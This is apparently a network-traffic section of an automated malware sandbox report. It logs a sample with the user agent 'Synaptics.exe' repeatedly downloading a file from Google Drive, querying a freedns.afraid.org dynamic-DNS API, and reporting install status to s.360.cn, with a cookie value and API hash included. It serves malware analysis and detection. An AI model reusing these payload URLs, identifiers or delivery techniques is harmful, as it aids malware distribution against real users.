                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
